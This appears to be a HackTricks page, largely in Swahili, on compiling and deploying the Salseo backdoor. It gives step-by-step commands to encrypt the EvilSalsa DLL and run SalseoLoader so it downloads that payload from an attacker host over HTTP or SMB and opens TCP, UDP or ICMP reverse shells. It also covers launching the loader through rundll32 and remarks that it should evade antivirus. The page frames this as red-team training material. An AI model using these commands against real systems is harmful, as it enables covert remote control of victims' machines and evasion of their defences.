7.3 KiB
Salseo
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Compiling the binaries
Pakua msimbo wa chanzo kutoka github na uunde EvilSalsa na SalseoLoader. Utahitaji Visual Studio iliyosakinishwa ili kuunda msimbo huo.
Uunde miradi hiyo kwa ajili ya usanifu wa sanduku la windows ambapo unakusudia kuitumia (Ikiwa Windows inasaidia x64 uunde kwa usanifu huo).
Unaweza kuchagua usanifu ndani ya Visual Studio katika "Build" Tab ya kushoto "Platform Target".
(**Ikiwa huwezi kupata chaguo hili bonyeza kwenye "Project Tab" kisha kwenye "<Project Name> Properties")
Kisha, jenga miradi yote miwili (Build -> Build Solution) (Ndani ya log zitajitokeza njia ya executable):
Prepare the Backdoor
Kwanza kabisa, utahitaji kuandika EvilSalsa.dll. Ili kufanya hivyo, unaweza kutumia script ya python encrypterassembly.py au unaweza kuunda mradi EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, sasa una kila kitu unachohitaji kutekeleza mambo yote ya Salseo: encoded EvilDalsa.dll na binary ya SalseoLoader.
Pakia binary ya SalseoLoader.exe kwenye mashine. Hazipaswi kugundulika na AV yoyote...
Tekeleza backdoor
Kupata TCP reverse shell (kupakua dll iliyosimbwa kupitia HTTP)
Kumbuka kuanzisha nc kama msikilizaji wa reverse shell na seva ya HTTP kutoa evilsalsa iliyosimbwa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Kupata shell ya UDP reverse (kushusha dll iliyokodiwa kupitia SMB)
Kumbuka kuanzisha nc kama msikilizaji wa shell ya reverse, na seva ya SMB kutoa evilsalsa iliyokodiwa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Kupata ICMP reverse shell (dll iliyosimbwa tayari ndani ya mwathiriwa)
Wakati huu unahitaji chombo maalum kwenye mteja kupokea reverse shell. Pakua: https://github.com/inquisb/icmpsh
Zima Majibu ya ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Tekeleza mteja:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Ndani ya mwathiriwa, hebu tuendeshe kitu cha salseo:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Kuunda SalseoLoader kama DLL inayosafirisha kazi kuu
Fungua mradi wa SalseoLoader ukitumia Visual Studio.
Ongeza kabla ya kazi kuu: [DllExport]
Sakinisha DllExport kwa mradi huu
Zana --> Meneja wa Kifurushi cha NuGet --> Simamisha Kifurushi cha NuGet kwa Suluhisho...
Tafuta kifurushi cha DllExport (ukitumia kichupo cha Browse), na bonyeza Sakinisha (na kubali popup)
Katika folda yako ya mradi, faili zifuatazo zimeonekana: DllExport.bat na DllExport_Configure.bat
Uondoe DllExport
Bonyeza Ondoa (ndiyo, ni ajabu lakini ni muhimu)
Toka Visual Studio na tekeleza DllExport_configure
Tu toka Visual Studio
Kisha, nenda kwenye folda ya SalseoLoader yako na tekeleza DllExport_Configure.bat
Chagua x64 (ikiwa unakusudia kuitumia ndani ya sanduku la x64, hiyo ilikuwa hali yangu), chagua System.Runtime.InteropServices (ndani ya Namespace kwa DllExport) na bonyeza Tumia
Fungua mradi tena na Visual Studio
[DllExport] haipaswi kuwa na alama ya kosa tena
Jenga suluhisho
Chagua Aina ya Matokeo = Maktaba ya Darasa (Mradi --> SalseoLoader Mali --> Programu --> Aina ya matokeo = Maktaba ya Darasa)
Chagua jukwaa la x64 (Mradi --> SalseoLoader Mali --> Jenga --> Lengo la jukwaa = x64)
Ili kujenga suluhisho: Jenga --> Jenga Suluhisho (Ndani ya console ya Matokeo, njia ya DLL mpya itaonekana)
Jaribu Dll iliyozalishwa
Nakili na ubandike Dll mahali unapotaka kuijaribu.
Tekeleza:
rundll32.exe SalseoLoader.dll,main
Ikiwa hakuna kosa linalojitokeza, huenda una DLL inayofanya kazi!!
Pata shell ukitumia DLL
Usisahau kutumia HTTP server na kuweka nc listener
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.